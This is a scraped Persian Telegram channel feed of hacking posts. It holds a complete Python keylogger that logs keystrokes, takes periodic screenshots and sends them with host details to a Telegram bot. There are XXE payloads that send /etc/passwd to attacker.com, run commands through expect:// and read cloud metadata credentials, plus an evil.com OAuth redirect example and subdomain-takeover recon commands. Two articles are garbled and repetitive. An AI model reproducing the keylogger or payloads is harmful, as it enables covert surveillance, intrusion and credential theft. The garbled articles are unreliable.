Spire Team
5.15K subscribers
69 photos
3 videos
92 files
166 links
> 🛡️ Ethical Hacking | Cyber Security
پاینده ایران و ایرانی
💻 Learn • Practice • Secure
🔐 Ethical & Educational Content Only
✅ We respect and follow Telegram's rules
🚫 No illegal or unauthorized activities
👤 @durov
Download Telegram
Subdomain Takeover، وقتی زیردامنه رو می‌دزدی

یه شرکت، دامنه اصلیشو داره: company.com
زیردامنه هم داره: status.company.com

این زیردامنه رو تو DNS به یه سرویس خارجی وصل کرده.
مثلاً به یه Heroku app یا GitHub Pages.

بعد چند سال، اون سرویس رو کنسل می‌کنه.
ولی رکورد DNS هنوز باقیه.

CNAME: status.company.com → old-app.herokuapp.com

حالا مهاجم میاد:
old-app.herokuapp.com رو خودش ثبت می‌کنه.

نتیجه:

status.company.com الان مال مهاجمه.
می‌تونه هر چی می‌خواد نشون بده.

چرا خطرناکه؟

کوکی‌های company.com به همه زیردامنه‌ها فرستاده میشن.
مهاجم با یه صفحه قلابی، کوکی‌ها رو می‌دزده.

یا یه صفحه لاگین جعلی می‌ذاره.
کارمندا فکر می‌کنن سایت خودشونه.

یا ایمیل می‌فرسته از اون دامنه.
SPF و DKIM ممکنه پاس شه چون دامنه معتبره.

پیدا کردنش:

subfinder -d company.com -silent | httpx -silent -status-code

اگه یه زیردامنه 404 داد، یعنی احتمالاً سرویس وصل نیست.
بعد با یه ابزار مثل nuclei چک کن:

nuclei -t takeovers/ -u https://status.company.com

پیلود ساده برای تست:

curl -I https://status.company.com

اگه خروجی "No such app" یا "Not found" بود،
یعنی سرویس خارجی هست ولی وصل نیست.
پس قابل تسخیره.

دفاع:
زیردامنه‌های بی‌استفاده رو حذف کن.
DNS رو منظم چک کن.
CNAME ها رو ببند.

#ℳℴ𝒷𝒾𝓃
❤5
import keyboard
import pyautogui
import socket
import requests
import time
import os
from threading import Thread

LOG = ""
SCREENSHOTS_DIR = "screenshots"
WEBHOOK_URL = "https://api.telegram.org/bot<токن_ربات>/sendMessage" # تغییر بده
CHAT_ID = "<آیدی_چت>" # تغییر بده

if not os.path.exists(SCREENSHOTS_DIR):
os.mkdir(SCREENSHOTS_DIR)

def send(data):
try:
requests.post(WEBHOOK_URL, data={"chat_id": CHAT_ID, "text": data})
except:
pass

def send_screenshot():
while True:
try:
filename = f"{SCREENSHOTS_DIR}/scr_{int(time.time())}.png"
pyautogui.screenshot(filename)
with open(filename, "rb") as f:
files = {'photo': f}
requests.post(f"https://api.telegram.org/bot<токن_رباط>/sendPhoto", data={'chat_id': CHAT_ID}, files=files)
os.remove(filename)
except:
pass
time.sleep(30) # هر 30 ثانیه یک اسکرین‌샷

def on_key_event(e):
global LOG
key = e.name
if len(key) == 1:
LOG += key
elif key == "space":
LOG += " "
elif key == "enter":
LOG += "\n"
elif key == "tab":
LOG += "\t"
else:
LOG += f"[{key}]"

if len(LOG) > 500: # هر 500 کاراکتر بفرست
send(LOG)
LOG = ""

keyboard.on_release(on_key_event)

# شروع ارسال اسکرین
Thread(target=send_screenshot, daemon=True).start()

# ارسال اطلاعات سیستم در ابتدا
hostname = socket.gethostname()
ip = socket.gethostbyname(hostname)
send(f"INFECTED: {hostname} | IP: {ip} | OS: {os.name}")

# حلقه اصلی
while True:
time.sleep(1)



یک کیلاگر تمیز
کتابخونه های مورد نیاز
pip install pynput pyautogui requests
این برای سیستم در آینده برای اندروید هم مینویسم
❤5
Subdomain Takeover، وقتی زیردامنه رو می‌دزدی

یه شرکت، دامنه اصلیشو داره: company.com
زیردامنه هم داره: status.company.com

این زیردامنه رو تو DNS به یه سرویس خارجی وصل کرده.
مثلاً به یه Heroku app یا GitHub Pages.

بعد چند سال، اون سرویس رو کنسل می‌کنه.
ولی رکورد DNS هنوز باقیه.

CNAME: status.company.com → old-app.herokuapp.com

حالا مهاجم میاد:
old-app.herokuapp.com رو خودش ثبت می‌کنه.

نتیجه:

status.company.com الان مال مهاجمه.
می‌تونه هر چی می‌خواد نشون بده.

چرا خطرناکه؟

کوکی‌های company.com به همه زیردامنه‌ها فرستاده میشن.
مهاجم با یه صفحه قلابی، کوکی‌ها رو می‌دزده.

یا یه صفحه لاگین جعلی می‌ذاره.
کارمندا فکر می‌کنن سایت خودشونه.

یا ایمیل می‌فرسته از اون دامنه.
SPF و DKIM ممکنه پاس شه چون دامنه معتبره.

پیدا کردنش:

subfinder -d company.com -silent | httpx -silent -status-code

اگه یه زیردامنه 404 داد، یعنی احتمالاً سرویس وصل نیست.
بعد با یه ابزار مثل nuclei چک کن:

nuclei -t takeovers/ -u https://status.company.com

پیلود ساده برای تست:

curl -I https://status.company.com

اگه خروجی "No such app" یا "Not found" بود،
یعنی سرویس خارجی هست ولی وصل نیست.
پس قابل تسخیره.

دفاع:
زیردامنه‌های بی‌استفاده رو حذف کن.
DNS رو منظم چک کن.
CNAME ها رو ببند.

#ℳℴ𝒷𝒾𝓃
❤5
دستور های کاربردی شبکه ویندوز

#CyberSecurity #Network #Windows #Coding #Internet #ᴛʏɢᴇʀ_ꜱᴘɪʀᴇ
❤4
OAuth، پیچیده‌ترین سیستم احراز هویت و رایج‌ترین باگش

OAuth چیکار می‌کنه؟

به یه سایت می‌گی: "من به تو اجازه می‌دم از طرف من با گوگل حرف بزنی."

جریان استاندارد:

1. کاربر → درخواست لاگین به target.com
2. target.com → کاربر رو می‌فرسته به accounts.google.com
3. کاربر → به گوگل لاگین می‌کنه
4. گوگل → یه کد به target.com میده
5. target.com → با کد، یه توکن از گوگل می‌گیره
6. target.com → با توکن، اطلاعات کاربر رو می‌گیره

باگ‌های رایج:

۱. Open Redirect in redirect_uri

اگه سرور redirect_uri رو اعتبارسنجی نکنه:

https://target.com/oauth/callback?redirect_uri=https://evil.com

توکن میره به evil.com.

۲. CSRF در OAuth

اگه state نداشته باشه یا ثابت باشه،
مهاجم یه درخواست لاگین جعل می‌کنه که به اکانت مهاجم وصل شه.
قربانی وارد میشه، ولی به حساب مهاجم لاگین میشه.

۳. Implicit Flow

توکن مستقیم تو URL میاد.
تاریخچه مرورگر، Referer، لاگ‌ها همه می‌بیننش.

۴. PKCE نبودن

تو Public Client ها، اگه PKCE نداشته باشه،
کد رهگیری میشه.

۵. Account Linking

اگه یه سایت چند تا روش لاگین داره،
مهاجم می‌تونه حساب قربانی رو به حساب خودش لینک کنه.

دفاع:
redirect_uri رو دقیقاً match کن، نه با regex.
state رندوم و یک‌بار مصرف.
PKCE رو حتماً استفاده کن.
از Authorization Code Flow استفاده کن، نه Implicit.

#ℳℴ𝒷𝒾𝓃
❤4
XXE، وقتی XML بهت اجازه خوندن فایل رو میده

XML یه قابلیت داره به اسم Entity.
می‌تونی با یه entity، یه مقدار رو چند جا استفاده کنی.

<!DOCTYPE foo [
<!ENTITY example "hello">
]>
<root>&example;</root>

حالا entity می‌تونه external هم باشه:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

اگه سرور این XML رو پردازش کنه،
محتوای /etc/passwd رو بهت برمی‌گردونه.

این به تنهایی فاجعه‌ست.
ولی می‌تونی بری جلوتر.

Blind XXE با OOB:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>

evil.dtd روی سرور مهاجم:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?%file;'>">
%all;

حالا سرور قربانی، محتوای /etc/passwd رو به سرور تو می‌فرسته.
حتی اگه هیچ چیزی بهت نشون نده.

با PHP Wrapper:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>

محتوای فایل base64 میشه.
چون ممکنه XML با کاراکترهای خاص مشکل داشته باشه.

یا با php://expect:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>

اگه expect نصب باشه، فرمان اجرا میشه.

SSRF با XXE:

<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>

میره سراغ Metadata ابری.
ممکنه Credentials AWS رو بگیری.

دفاع:
Disable external entities تو Parser.
از فرمت‌های دیگه مثل JSON استفاده کن.
Parser رو آپدیت کن.

#ℳℴ𝒷𝒾𝓃
❤3👏1💔1
**عنوان:** تست نفوذ در شبکه: یک روش بهنگار برای امنیت سایبری

**متن:**

تست نفوذ (Penetration Test) یک روش بهنگار برای امنیت سایبری است که در آن، یک هکر یا متخصص شبکه به یک شبکه سایبی، با هدف تشخیص نقاط ضعف آن، نفوذ و آسیب‌های بالقوه را شناسایی و در نتیجه، راه‌های جلوگیری را پیشنهاد می‌کند. این روش در تست نفوذ، به‌صورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعف و آسیب‌های بالقبه است.

**تست نفوذ در چیست؟**

تست نفوذ یک روش بهنگار است که هدفش، شناسایی نقاط ضرفت در شبکه سایبی است. این روش شامل شناسایی نقاط ضعف و آسیب‌های بالقبه از نظر فنی، نفوذ به شبکه، و شناسایی نقاط ضعف و آسیب‌های بالقبه است. این روش در تست نفوذ، به‌صورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضرف و آسیب‌های بالقبه است.

**چشم**

در تست نفوذ، هکر یا متخصص شبکه سعی می‌کند که نقاط ضعفی در شبکه را شناسایی و شناسایی. این کار، در تست نفوذ، شامل:

* **شناسایی نقاط ضعفی**: شناسایی نقاط ضعف در شبکه، مانند هاب‌های باز، هاب‌های بسته، هاب‌های فاقد و هاب‌های رمز شده، و هاب‌های رمز نشده است.
* **شناسایی نقاط آسیب**: شناسایی آسیب‌های بالقبه در شبکه، مانند هاب‌های رمز شده، هاب‌های فاقد، هاب‌های هک شده، و هاب‌های رمز نشده است.

**مرحله**

در تست نفوذ، شناسایی نقاط ضعفی و آسیب‌های بالقبه در شبکه سایبی، و در نتیجه، راه‌های جلوگیری را پیشنهاد می‌کنیم. این روش در تست نفوذ، به‌صورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیب‌های بالقبه است.

**مثال‌ها**

در تست نفوذ، یک مثال ساده برای شناسایی نقاط ضعفی، می‌توان در شبکه، یک هاب باز یا یک هاب باز را تست کرد. این تست نشان می‌دهد که نقاط ضعفی در هاب باز، در شبکه، شناسایی می‌شود.

در تست نفوذ، یک مثال برای شناسایی آسیب‌های بالقبه در شبکه، می‌توان یک هاب باز را تست کرد. این تست نشان می‌دهد که آسیب‌های بالقبه در هاب باز، در شبکه، شناسایی می‌شود.

**نتیجه**

در تست نفوذ، شناسایی نقاط ضعفی و آسیب‌های بالقبه در شبکه سایبی، و در نتیجه، راه‌های جلوگیری را پیشنهاد می‌کنیم. این روش در تست نفوذ، به‌صورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیب‌های بالقبه است.

**نکاتیب**

در تست نفوذ، یک نکتِب برای شناسایی نقاط ضعفی و آسیب‌های بالقبه در شبکه سایبی، می‌توان در تست نفوذ، یک روش برای شناسایی نقاط ضعفی و آسیب‌های بالقبه استفاده کرد. این روش شامل شناسایی نقاط ضعفی و آسیب‌های بالقبه است.

**نتیجه**

در تست نفوذ، شناسایی نقاط ضعفی و آسیب‌های بالقبه در شبکه سایبی، و در نتیجه، راه‌های جلوگیری را پیشنهاد می‌کنیم. این روش در تست نفوذ، به‌صورت یک چارچ برای تست امنیت شبکه، با تمرکز بر روی نقاط ضعفی و آسیب‌های بالقبه است.

#Ai #KaliLinux #CyberSecurity
❤4👏1
اگر لیست تبادل میشناسین معرفی کنین
یا اگر کانالی دارید بالای 5k بیایین تبادل کنیم
@net_activenull
❤2👏1
Spire Team pinned «اگر لیست تبادل میشناسین معرفی کنین یا اگر کانالی دارید بالای 5k بیایین تبادل کنیم @net_activenull»
سرمئیت سایبری: آسیب‌پذیری در برنامه‌نویسی با زبان پایتون

در عصر سایبری که همه چیزها دیجیتال شده‌اند، آسیب‌پذیری یک موضوع جدی است. به هرچه تمام باشد، در این مقاله، درباره آسیب‌پذیری‌هایی که در برنامه‌های نوشته شده به زبان پایتون می‌توان با آنها ملاقات کرد.
آسیب‌پذیری‌های برنامه‌های پایتون

1. آسیب‌پذیری از نوع Buffer Overflow: این آسیب‌پذیری هنگامه‌ای است که هنگامی که یک حافظه‌ی به دراز رسیده و از محدوده‌ی آن بیشتر از حد نصیب می‌گردد، برنامه را ببخورده می‌کند.
2. آسیب‌پذیری از نوع SQL Injection: این آسیب‌پذیری یک روش نفیز است برای نفیز سایبری در برنامه‌نویسی. آسیب‌پذیری SQL Injection، به طور عمده‌ای به این موضوع کمک می‌کند که برنامه‌ای که یک سایبری در زبان پایتون است، نفیز کرده و آسیب‌پذیری را ایجاد کند.
3. آسیب‌پذیری از نوع Command Injection: این آسیب‌پذیری هنگامه‌ای است که برنامه‌ای که سایبری است، دستورهای نفیزی را در خود اجرا می‌کند.
4. آسیب‌پذیری از نوع File Inclusion: این آسیب‌پذیری هنگامه‌ای است که برنامه‌ای که سایبری است، فایل‌های نفیزی را در خودش فشره می‌کند.
5. آسیب‌پذیری از نوع Cross-Site Scripting: این آسیب‌پذیری هنگامه‌ای است که برنامه‌ای که سایبری است، اطلاعات نفیزی را دریافت می‌کند.

دستورهای جلوگیر از این آسیب‌پذیری‌ها
1. Buffer Overflow: به جای استفاده از ورودی‌های بی‌نظمی در برنامه‌ها، از ورودی‌های چک‌چشم و چک‌دار استفاده کنید.
2. SQL Injection: به جای استفاده از ورودی‌های نفیزی برای SQL، از ورودی‌های چک‌چشم و چک‌دار استفاده کنید.
3. Command Injection: در برنامه‌های پایتون، از ورودی‌های چک‌چشم و چک‌دار استفاده کنید.
4. File Inclusion: برنامه‌ها را در گونه‌ای که فشردن فایل‌های نفیزی را به آن‌ها مجاز نباشد، نوشته تا آسیب‌پذیری را جلوگیری کنید.
5. Cross-Site Scripting: برنامه‌ها را به گونه‌ای که اطلاعات نفیزی را دریافت نکنند نوشته تا آسیب‌پذیری را جلوگیری کنید.

در این مقاله، به آسیب‌پذیری‌هایی که در برنامه‌های پایتون می‌توان به آنها ملاقات کرد، پرداخته شد. به‌همین، با استفاده از دستورهای جلوگیر بالا، این آسیب‌پذیری‌ها را می‌توان جلوگیری کرد.

#Ai
❤4👏2
یک ادمین برای تبلیغات و ممبر اوردن میخام حقوق هم از ماه بعدش طبق فعالیتش حقوق میدم بهش کسی بود در خدمتم
@net_activenull
سن بالا بیاد
❤3👏1
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai

قابلیت‌های گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیت‌هاب (GitHub) برای مدیریت کدها و پروژه‌ها، ویکی‌پدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعه‌ای از سایت‌های تخصصی اطلاعاتی و پایگاه‌های داده، امکان جمع‌آوری و پردازش حجم عظیمی از داده‌ها را فراهم می‌سازد.
- ابزارهای حرفه‌ای OSINT (هوش‌یابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمع‌آوری اطلاعات از منابع باز را به‌شکل خودکار و دقیق تسهیل می‌کند. این قابلیت برای تحلیل‌های عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصی‌سازی بالا و انعطاف‌پذیری: کاربران می‌توانند با تنظیمات دقیق و شخصی‌سازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجی‌ها کاملاً متناسب با اهداف آن‌ها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش هم‌زمان درخواست‌ها و پاسخ‌گویی سریع، Nullspire Ai برای انجام پروژه‌های بزرگ و پیچیده ایده‌آل است.
❤6👏1🤣1
📃تصویر دقیقاً ساختار و آناتومی یک خط از فایل /etc/shadow در سیستم‌های لینوکس رو نشون می‌ده. این فایل حاوی اطلاعات حساس رمز عبور کاربران هست و فقط روت (root) بهش دسترسی داره.
❤6⚡1🔥1👏1
سلام! این عکس دوم مکمل عالی برای عکس قبلیه. این تصویر ساختار فایل /etc/passwd رو نشون میده. تفاوت اصلی این فایل با /etc/shadow اینه که فایل passwd برای همه قابل خوندنه (Public) و اطلاعات عمومی کاربران مثل نام کاربری، شناسه کاربر (UID)، مسیر خونه و شل پیش‌فرضشون رو نگه می‌داره.
❤5
Notes_260923_120210.PDF
1.5 MB
جزئیات کامل و دقیق مربوط به عکس هست
#CyberSecurity #ᴛʏɢᴇʀ_ꜱᴘɪʀᴇ
❤6👎1